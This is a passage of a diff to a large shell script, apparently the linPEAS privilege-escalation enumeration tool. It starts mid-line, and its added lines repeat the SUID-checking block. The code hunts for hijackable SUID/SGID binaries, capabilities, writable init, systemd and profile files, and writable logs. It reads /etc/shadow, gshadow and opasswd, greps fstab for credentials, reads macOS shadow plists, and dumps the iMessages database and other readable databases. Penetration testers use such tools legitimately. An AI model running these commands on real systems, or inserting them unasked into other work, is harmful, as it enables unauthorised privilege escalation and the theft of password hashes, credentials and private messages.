#Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo $s | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if ! [ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do - sline_first="$(echo "$sline" | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi - fi - fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then - printf $ITALIC - echo "----------------------------------------------------------------------------------------" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH - export LD_LIBRARY_PATH="" - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf $NC - export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH - echo "----------------------------------------------------------------------------------------" - echo "" - fi - fi - fi - fi - fi - done; - echo "" - - - ##-- IF) SGID - print_2title "SGID" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - sgids_files=$(find / -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) - for s in $sgids_files; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total";then break; fi - - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if ! [ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" | sort | uniq | while read sline; do - sline_first="$(echo $sline | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" - fi - fi - fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then - printf "$ITALIC" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf "$NC" - echo "" - fi - fi - fi - fi - fi - done; - echo "" - - ##-- IF) Misconfigured ld.so - print_2title "Checking misconfigurations of ld.so" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" - printf $ITALIC"/etc/ld.so.conf\n"$NC; - cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat /etc/ld.so.conf 2>/dev/null | while read l; do - if echo "$l" | grep -q include; then - ini_path=$(echo "$l" | cut -d " " -f 2) - fpath=$(dirname "$ini_path") - if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - for f in $fpath/*; do - printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - done - fi - done - echo "" - - ##-- IF) Capabilities - print_2title "Capabilities" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" - echo "Current capabilities:" - (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" - (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" - echo "" - echo "Shell capabilities:" - (capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" - (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" - echo "" - echo "Files with capabilities (limited to 50):" - getcap -r / 2>/dev/null | head -n 50 | while read cb; do - capsVB_vuln="" - - for capVB in $capsVB; do - capname="$(echo $capVB | cut -d ':' -f 1)" - capbins="$(echo $capVB | cut -d ':' -f 2)" - if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then - echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," - capsVB_vuln="1" - break - fi - done - - if ! [ "$capsVB_vuln" ]; then - echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," - fi - - if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then - echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," - fi - done - echo "" - - ##-- IF) Users with capabilities - print_2title "Users with capabilities" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" - if [ -f "/etc/security/capability.conf" ]; then - grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - else echo_not_found "/etc/security/capability.conf" - fi - echo "" - - ##-- IF) Files with ACLs - print_2title "Files with ACLs (limited to 50)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" - ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - - if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) - ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - fi - echo "" - - ##-- IF) Files with ResourceFork - #if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER - # print_2title "Files with ResourceFork" - # print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" - # find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" - #fi - #echo "" - - ##-- IF) .sh files in PATH - print_2title ".sh files in path" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" - echo $PATH | tr ":" "\n" | while read d; do - for f in $(find "$d" -name "*.sh" 2>/dev/null); do - if ! [ "$IAMROOT" ] && [ -O "$f" ]; then - echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) - echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; - fi - done - done - echo "" - - print_2title "Broken links in path" - echo $PATH | tr ":" "\n" | while read d; do - find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; - done - echo "" - - - if [ "$MACPEAS" ]; then - print_2title "Unsigned Applications" - macosNotSigned /System/Applications - fi - - ##-- IF) Unexpected folders in / - print_2title "Unexpected in root" - if [ "$MACPEAS" ]; then - (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," else - (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found - fi - echo "" - - ##-- IF) Files (scripts) in /etc/profile.d/ - print_2title "Files (scripts) in /etc/profile.d/" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" - if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" - if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - fi - echo "" - - ##-- IF) Files (scripts) in /etc/init.d/ - print_2title "Permissions in init, init.d, systemd, and rc.d" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" - if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - fi - echo "" - - ##-- IF) Hashes in passwd file - print_list "Hashes inside passwd file? ........... " - if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Writable in passwd file - print_list "Writable passwd file? ................ " - if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Credentials in fstab - print_list "Credentials in fstab/mtab? ........... " - if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Read shadow files - print_list "Can I read shadow files? ............. " - if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "Can I read shadow plists? ............ " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - print_list "Can I write shadow plists? ........... " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - ##-- IF) Read opasswd file - print_list "Can I read opasswd file? ............. " - if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" - else echo_no - fi - - ##-- IF) network-scripts - print_list "Can I write in network-scripts? ...... " - if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Read root dir - print_list "Can I read root folder? .............. " - (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no - echo "" - - ##-- IF) Root files in home dirs - print_2title "Searching root files in home dirs (limit 30)" - (find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found - echo "" - - ##-- IF) Others files in my dirs - if ! [ "$IAMROOT" ]; then - print_2title "Searching folders owned by me containing others files on it (limit 100)" - (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" - echo "" - fi - - ##-- IF) Readable files belonging to root and not world readable - if ! [ "$IAMROOT" ]; then - print_2title "Readable files belonging to root and readable by me but not world readable" - (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found - echo "" - fi - - ##-- IF) Modified interesting files into specific folders in the last 5mins - print_2title "Modified interesting files in the last 5mins (limit 100)" - find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," - echo "" - - ##-- IF) Writable log files - print_2title "Writable log files (logrotten) (limit 100)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" - logrotate --version 2>/dev/null || echo_not_found "logrotate" - lastWlogFolder="ImPOsSiBleeElastWlogFolder" - logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100) - printf "%s\n" "$logfind" | while read log; do - if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found - if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; - elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case - elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; - elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; + c="a" + for b in $sidB; do + if echo $s | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; fi - fi - done - - echo "" - - ##-- IF) Files inside my home - print_2title "Files inside $HOME (limit 20)" - (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found - echo "" - - ##-- IF) Files inside /home - print_2title "Files inside others home (limit 20)" - (find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found - echo "" - - ##-- IF) Mail applications - print_2title "Searching installed mail applications" - ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" - echo "" - - ##-- IF) Mails - print_2title "Mails (limit 50)" - (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found - echo "" - - ##-- IF) Backup folders - print_2title "Backup folders" - printf "%s\n" "$backup_folders" | while read b ; do - ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; - ls -l "$b" 2>/dev/null && echo "" - done - echo "" - - ##-- IF) Backup files - print_2title "Backup files (limited 100)" - backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) - printf "%s\n" "$backs" | head -n 100 | while read b ; do - if [ -r "$b" ]; then - ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; - fi; - done - echo "" - - ##-- IF) DB files - if [ "$MACPEAS" ]; then - print_2title "Reading messages database" - sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null - - fi - print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" - FILECMD="$(command -v file 2>/dev/null)" - if [ "$PSTORAGE_DATABASE" ]; then - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if [ "$FILECMD" ]; then - echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," else - echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; - fi - done - SQLITEPYTHON="" - echo "" - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd - printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC - if [ "$(command -v sqlite3 2>/dev/null)" ]; then - tables=$(sqlite3 $f ".tables" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then - SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) - tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - else - tables="" - fi - if [ "$tables" ]; then - printf "%s\n" "$tables" | while read t; do - columns="" - # Search for credentials inside the table using sqlite3 - if [ -z "$SQLITEPYTHON" ]; then - columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") - # Search for credentials inside the table using python - else - 